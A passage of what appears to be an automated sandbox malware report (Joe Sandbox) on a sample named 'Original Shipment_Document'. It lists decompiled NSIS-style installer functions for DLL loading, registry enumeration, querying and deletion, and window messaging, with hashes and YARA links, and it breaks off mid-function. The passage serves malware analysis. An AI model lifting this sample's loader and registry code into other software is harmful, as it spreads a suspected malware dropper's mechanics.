                                                • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                                • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2e0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406943(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E00405569(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B56( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                0x004020d8
                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                  • Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,004033ED), ref: 004055C4
                                                  • Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll), ref: 004055D6
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                • Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
                                                • Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                • Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce28; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406544(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce28; // 0x0
						 *_t34 = _t12;
						 *0x40ce28 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x4
							E00406507(_t30, _t3);
							_push(_t33);
							 *0x40ce28 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E00406507(_t32, _t33 + 4);
								_t22 =  *0x40ce28; // 0x0
								E00406507(_t36, _t22 + 4);
								_t25 =  *0x40ce28; // 0x0
								_push(_t32);
								_push(_t25 + 4);
								E00406507();
								L15:
								 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406544(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B67();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                0x00401b9b
                                                0x00401b9b
                                                0x00401b9e
                                                0x00401ba6
                                                0x00401bef
                                                0x00401c1d
                                                0x00401c26
                                                0x00401c28
                                                0x00401c2c
                                                0x00401c31
                                                0x00401c36
                                                0x00401c38
                                                0x00401bf1
                                                0x00401bf3
                                                0x0040292e
                                                0x00401bf9
                                                0x00401bf9
                                                0x00401bfe
                                                0x00401c05
                                                0x00401c06
                                                0x00401c0b
                                                0x00401c0b
                                                0x00401bf3
                                                0x00000000
                                                0x00401ba8
                                                0x00401ba8
                                                0x00401ba8
                                                0x00401bab
                                                0x00000000
                                                0x00000000
                                                0x00401bb1
                                                0x00401bb5
                                                0x00000000
                                                0x00401bb7
                                                0x00401bb9
                                                0x00000000
                                                0x00401bbf
                                                0x00401bbf
                                                0x00401bc2
                                                0x00401bc9
                                                0x00401bce
                                                0x00401bd8
                                                0x00401bdd
                                                0x00401be2
                                                0x00401be6
                                                0x00402a94
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c33
                                                0x00402c33
                                                0x00401bb9
                                                0x00000000
                                                0x00401bb5
                                                0x0040238a
                                                0x00402397
                                                0x00402398
                                                0x0040239d
                                                0x0040239d
                                                0x00402c35
                                                0x00402c39

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 00401C0B
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                  • Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                  • Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000), ref: 00406743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                • String ID: Call
                                                • API String ID: 3292104215-1824292864
                                                • Opcode ID: f418f4755481c4114f64f720804408e05d6c5a7bbeb0d0f27e07374d9fb1a393
                                                • Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
                                                • Opcode Fuzzy Hash: f418f4755481c4114f64f720804408e05d6c5a7bbeb0d0f27e07374d9fb1a393
                                                • Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                0x0040259e
                                                0x0040259e
                                                0x0040259e
                                                0x004025a3
                                                0x004025aa
                                                0x004025ac
                                                0x004025b4
                                                0x004025b7
                                                0x004025ba
                                                0x0040292e
                                                0x004025c0
                                                0x004025c8
                                                0x004025cb
                                                0x004025e4
                                                0x004025ea
                                                0x004025ec
                                                0x004025ee
                                                0x004025ee
                                                0x004025cd
                                                0x004025d1
                                                0x004025d1
                                                0x004025f5
                                                0x004025fc
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                • RegEnumValueW.ADVAPI32 ref: 004025E4
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse53EC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Enum$CloseValue
                                                • String ID:
                                                • API String ID: 397863658-0
                                                • Opcode ID: 95042804e226a3edbcc009fbc96772bf2c2201535280c9fa5a1eeb71823b5771
                                                • Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
                                                • Opcode Fuzzy Hash: 95042804e226a3edbcc009fbc96772bf2c2201535280c9fa5a1eeb71823b5771
                                                • Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E0040644E(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}








                                                0x0040252a
                                                0x0040252a
                                                0x0040252f
                                                0x00402536
                                                0x00402538
                                                0x0040253f
                                                0x00402542
                                                0x0040292e
                                                0x00402548
                                                0x0040254b
                                                0x00402566
                                                0x00402596
                                                0x00402596
                                                0x00402599
                                                0x00402568
                                                0x0040256c
                                                0x00402585
                                                0x0040258c
                                                0x0040258f
                                                0x0040256e
                                                0x00402571
                                                0x0040257c
                                                0x004025f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402571
                                                0x0040256c
                                                0x004025fc
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse53EC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 57dd2373f57ea1f6219187d19d0dfe57b0d65b34ca6df6b0f1408f242272ef2b
                                                • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                • Opcode Fuzzy Hash: 57dd2373f57ea1f6219187d19d0dfe57b0d65b34ca6df6b0f1408f242272ef2b
                                                • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42920c =  *0x42920c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0); // executed
					}
				}
				return 0;
			}










                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402434(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t18 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1);
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                0x00402434
                                                0x00402434
                                                0x00402437
                                                0x0040243a
                                                0x0040247b
                                                0x00000000
                                                0x0040243c
                                                0x0040243e
                                                0x00402443
                                                0x00402447
                                                0x0040292e
                                                0x0040292e
                                                0x0040244d
                                                0x0040245d
                                                0x0040245f
                                                0x0040247d
                                                0x0040247f
                                                0x00000000
                                                0x00402485
                                                0x0040247f
                                                0x00402447
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CloseDeleteValue
                                                • String ID:
                                                • API String ID: 2831762973-0
                                                • Opcode ID: ff059aa1b3ae09757bbfd7b6d29cdc5ad8e3c3d0d5a22fe0fe3f65df460a2e98
                                                • Instruction ID: 3efe7552218bc8638c386b206662a839c6be39db124f2854c1ef7ee844e7f5c6
                                                • Opcode Fuzzy Hash: ff059aa1b3ae09757bbfd7b6d29cdc5ad8e3c3d0d5a22fe0fe3f65df460a2e98
                                                • Instruction Fuzzy Hash: 39F0C232A00120EBDB11ABB89B4DAAD72A8AF44314F15443BE141B71C0DAFC4D01866E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                • Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x4291f0;
